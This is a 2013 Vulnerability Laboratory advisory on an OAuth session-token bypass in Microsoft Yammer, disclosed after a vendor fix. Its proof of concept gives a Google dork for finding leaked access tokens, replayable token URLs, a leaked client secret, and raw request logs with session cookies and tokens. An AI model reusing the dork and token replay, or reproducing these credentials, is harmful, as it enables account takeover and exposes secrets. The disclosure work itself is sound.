Title:
======
Microsoft Yammer Social Network - oAuth Bypass (Session Token) Vulnerability


Date:
=====
2013-08-04


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1003

Microsoft Security Response Center (MSRC) ID:  15126

Video:  http://www.vulnerability-lab.com/get_content.php?id=1043
View:    http://www.youtube.com/watch?v=SwxWNvmOsU4


VL-ID:
=====
1003


Common Vulnerability Scoring System:
====================================
9.3


Introduction:
=============
Yammer, Inc. is a freemium enterprise social network service that was launched 
in 2008 and sold to Microsoft in 2012. Yammer 
is used for private communication within organizations or between 
organizational members and pre-designated groups, making it 
an example of enterprise social  software. It originally launched as an 
enterprise microblogging service and now has applications 
on several different operating systems and devices. Access to a Yammer network 
is determined by a user`s Internet domain, so 
only those with appropriate email addresses may join their respective networks.

Yammer is a secure, private social network for your company. Yammer empowers 
employees to be more productive and successful by 
enabling them to collaborate easily, make smarter decisions faster, and 
self-organize into teams to take on any business challenge. 
It is a new way of working that naturally drives business alignment and 
agility, reduces cycle times, engages employees and improves 
relationships with customers and partners.

Pioneered Enterprise Social Networking when we launched in 2008 Among the 
fastest growing enterprise software companies in history, 
exceeding over four million users in just three years. Raised $142 million in 
venture funding from top tier firms Used by more 
than 200,000+ companies worldwide

Built social from the ground up with ‘Facebook DNA’: Facebook’s Founding 
President, Sean Parker serves on Yammer’s Board of Directors 
Yammer and Facebook share the same first investor, Peter Thiel; backed by 
Social+Capital Partnership – a fund established by former 
Facebook Vice President, Chamath Palihapitiya. More than 80 percent of the 
Fortune 500® are using Yammer. Leading organizations 
including Ford, Nationwide, 7-Eleven, Orbitz Worldwide, Rakuten, and Telefonica 
O2 have adopted Yammer.

Protocol Introduction:

OAuth is an emerging authorization standard that is being adopted by a growing 
number of sites such as Twitter, Facebook, Google, 
Yahoo!, Netflix, Flickr, and several other Resource Providers and social 
networking sites. It is an open-web specification for 
organizations to access protected resources on each other`s web sites. This is 
achieved by allowing users to grant a third-party 
application access to their protected content without having to provide that 
application with their credentials.

Unlike Open ID, which is a federated authentication protocol, OAuth, which 
stands for Open Authorization, is intended for delegated 
authorization only and it does not attempt to address user authentication 
concerns. There are several excellent online resources, 
referenced at the end of this article, that provide great material about the 
protocol and its use.

Vendor  Homepage:       http://www.microsoft.com
Product Homepage:       https://www.yammer.com


Abstract:
=========
The Vulnerability Laboratory Research Team has discovered multiple critical 
Vulnerabilities in the Microsoft Yammer Social Network.


Report-Timeline:
================
2013-07-09: Researcher Notification & Coordination (Ateeq Khan)
2013-07-10: Vendor Notification (Microsoft Security Response Center)
2013-07-11: Vendor Response/Feedback (Microsoft Security Response Center)
2013-07-30: Vendor Fix/Patch (Microsoft Developer Team)
2013-08-04: Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Microsoft Corporation
Product: Yammer - Social Network Application 2013 Q2


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
An auth bypass session token web vulnerability is detected in the official 
Microsoft Yammer Social Network online-service application.
The vulnerability allows remote attackers to bypass the token protection to 
compromise the account auth system of the web-application.

[*] `Critical Information Disclosure` due to `Insecure Oauth 2 Implementation` 
resulting in `Auth Bypass.`

The Oauth 2 protocol is all about authenticating the Client (consumer key and 
secret) and the User to the Server, but not the other way around. 
There is no protocol support to check the authenticity of the Server during the 
handshakes. So essentially, through phishing or other exploits, 
user requests can be directed to a malicious Server where the User can receive 
malicious or misleading payloads. This could adversely impact 
the Users, but also the Client and Server in terms of their credibility and 
bottom-line. 

It has been discovered that due to insecure implementation of OAuth on the 
Yammer network, it is possible to steal other user profiles by simply 
requesting a leaked access token which can be accquired from publically 
accessable search engine results. (Google`s Cache) and or by other possible 
means.

During the testing, the researcher was able to accquire sensitive information 
(valid access_tokens) using Google search engine and upon further 
testing it was revealed that by including the access token directly in the 
browser through an HTTPS request, it is possible to log on to Yammer as the 
affected user. The session gets authenticated without entering the 
login/password credentials.  

Using the google search engine, the researchers was able to find a particular 
link listed publically in the results and upon 
requesting that link directly in the browser, the researcher was instantly 
logged in as the given `user` with full priviledges to 
the profile. We have explained all steps in the POC section for further 
analysis. Please note, We were able to find atleast 2 valid 
tokens using Google search engine cache results.

The variable that is revealed publically is located in the Yammer API module in 
the /api/v1/messages?access_token=[Valid Token Here] parameter. 

The fact that search engine bots are able to capture live user session data / 
sensitive URL parameters in its cache which is publically accessable by 
everyone should be noticed and fixed immediately. Also the fact that by 
requesting the access token directly in your browser through HTTPS, it simply 
logs you in the Yammer social network as the affected user is also alarming.   

This vulnerability results in a complete compromise of the affected accounts, 
user profile and the associated risk is critical. 
Exploitation of the vulnerability requires no user interaction and also no 
registered Yammer account is required. To capture the session 
the attacker can use a random empty session as form to request.

Vulnerable Service(s):
                                [+] Microsoft Yammer Social Network

Vulnerable Parameter(s):
                                [+] api/access_token 


Proof of Concept:
=================
The remote auth bypass vulnerability can be exploited by remote attacker 
without privileged application user account or user interaction.
For demonstration or reproduce ...

1) Use the following Google dork to find the valid access tokens listed 
publically in the search engine cache results.

Google Dork:    site:yammer.com inurl:'access_token'

1) Open the POC link #1 in your browser
   https://www.yammer.com/api/v1/messages?access_token=NPLpzPsWdtCeXaKxBGA (You 
will be directly authenticated as the affected user upon requesting this link)

2) Open another browser tab and visit the Yammer social network website 
(https://www.yammer.com)
3) You will now be redirected to the user profile with full access and 
priviledges hence proving the existence of this vulnerability.


PoC Link #2

https://www.yammer.com/api/v1/messages?access_token=cQ5AwEgUocADLNQPUncVuQ

PoC Example:

https://[SERVER]/[API]/[VERSION]/[FILE]?access_token=[Bypass]


Note: you can use any of the Two given links mentioned above to reproduce this 
POC.


Other sensitive links captured from search engine cache:

https://www.yammer.com/oauth2/access_token?client_id=zlFlQNVPwAL2EdBefl8Ow&client_secret=3aUo5FpsU8oDqYW24NQtEFxtBniMM14Gt6m7lT6Lcs
&code=GA8HWbcqk461mWOk4uLcQ

https://www.yammer.com/ccure.it/signup/new_email_confirmation?activation_code=1g6tm-dmx85rk5l3ckijz6k2sz6x3ei


--- PoC Request & Response Session Logs ---
HTTP GET Request

GET /api/v1/messages?access_token=cQ5AwEgUocADLNQPUncVuQ HTTP/1.1
Host: www.yammer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: _workfeed_session_id=dd9fa728ce6dc861df3cba09e46dc800; 
yamtrak_id=fc24240f-5d58-40e9-a647-e1bed7232e5b; 

__utma=253772928.1821170373.1373278291.1373278291.1373316169.2; 
__utmc=253772928; __utmz=253772928.1373278291.1.1.utmcsr=(direct)|
utmccn=(direct)|utmcmd=(none); 
WT_FPC=id=115.186.111.196-3513600256.30305614:lv=1373269393265:ss=1373269370644;
 WT_NVR=0=/:
1=enterprisesns.com; kvcd=1373316182244; 
km_ai=YKAMlAV8CfR7RVANZHFvRaE6psA%3D; km_uq=; km_lv=x; 
__ar_v4=BUIR53QGUNCHPAA5IDCCTB%3A20130707%3A3%7C5EWZRLDA4NDSLFONDMVGDZ%3
A20130707%3A3%7CF3JVO7OG3NEMZA2LRFRDZD

%3A20130707%3A2%7CQF74DUYCSFC4HP47P56MLN%3A20130707%3A1; 
__utmb=253772928.2.10.1373316169; km_vs=1; browser_token=2be660391eb2600cf
5c4b4dfa3fa9f0d0515eb0d; unverified_email=ateeq%40ccure.it



HTTP Response:

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 08 Jul 2013 20:51:37 GMT
Content-Type: application/xml; charset=utf-8
Connection: keep-alive
Status: 200 OK
ETag: "250c045d140d9c3cfdc554d69e5c387e"
Access-Control-Allow-Methods: OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, 
CONNECT, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, 
UNLOCK, VERSION-CONTROL, REPORT, CHECKOUT, CHECKIN, UNCHECKOUT, MKWORKSPACE, 
UPDATE, LABEL, MERGE, BASELINE-CONTROL, MKACTIVITY, ORDERPATCH, 
ACL, SEARCH, PATCH
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
Access-Control-Allow-Headers: Content-Type, X-Requested-With, NETWORK_ID, 
Authorization, X-CSRF-Token
Access-Control-Allow-Origin: https://ymodules.yammer.com
X-Runtime: 0.444532
X-Date: 1373316697937
Access-Control-Allow-Credentials: true
X-XSS-Protection: 1; mode=block
Content-Length: 70544

<?xml version="1.0" encoding="UTF-8"?>
<response>
  <meta>
    <current-user-id>10490568</current-user-id>
    <direct-from-body>false</direct-from-body>
    <followed-user-ids>
      <followed-user-id>10638646</followed-user-id>
    </followed-user-ids>
    <feed-name>Company Feed</feed-name>
    <realtime>
      <channel-id>MTozNTc3OTc6MzU3Nzk3</channel-id>
      
<authentication-token>9mP6fBnFfNlUvZGG0Bwt5nUPJBxmlRqoaG3bMiBsMqJ4nKtWKi1OLVKyMjQwsTQwNbPQUcpLLSnPL8pWsjI2NTe3NNdRSq0oyCyqBCoxNje1t
DQ1sDSvBQCsgA8z</authentication-token>
      <uri>https://1-087.rt.yammer.com/cometd/</uri>
    </realtime>
    <feed-desc>jungletorch.com's public messages</feed-desc>
    <older-available>true</older-available>
    <followed-references>
      <followed-reference>
        <type>open_graph_object</type>
        <id>344060296338433</id>
      </followed-reference>
    </followed-references>
    <ymodules/>
    <requested-poll-interval>60</requested-poll-interval>
  </meta>
  <references>
    <reference>
      <type>thread</type>
      
<web-url>https://www.yammer.com/jungletorch.com/#/Threads/show?threadId=289043199</web-url>
      <direct-message>false</direct-message>
Connection: keep-alive



Solution:
=========
TLS/SSL is the recommended approach to prevent any eavesdropping during the 
data exchange. Search Engine bots crawling should be restricted 
from capturing sensitive URL parameters from user sessions. Also user 
notifications should be enabled if an authentication request is being 
performed through the HTTPS protocol. Furthermore, Resource Providers can limit 
the likelihood of a replay attack from a tampered request by 
implementing protocol`s Nonce and Timestamp attributes. The value of 
oauth_nonce attribute is a randomly generated number to sign the Client 
request, and the oauth_timestamp defines the retention timeframe of the Nonce.

Insecure Storage of Secrets:
Protecting the integrity of the Client Credentials and Token Credentials works 
fairly well when it comes to storing them on servers. The secrets 
can be isolated and stored in a database or file-system with proper access 
control, file permission, physical security, and even database or 
disk encryption. For securing Client Credentials on mobile application clients, 
follow security best practices for storing sensitive, non-stale 
data such as application passwords and secrets.



Risk:
=====
The security risk of this insecure Oauth implementation vulnerability is 
estimated as critical.


Credits:
========
Vulnerability Laboratory [Research Team] - Ateeq Khan (at...@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
               - www.evolution-sec.com
Contact:    ad...@vulnerability-lab.com         - 
resea...@vulnerability-lab.com               - ad...@evolution-sec.com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com    
               - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
               - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
resea...@vulnerability-lab.com) to get a permission.

                                Copyright © 2013 | Vulnerability Laboratory 
[Evolution Security]

-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com


Reply via email to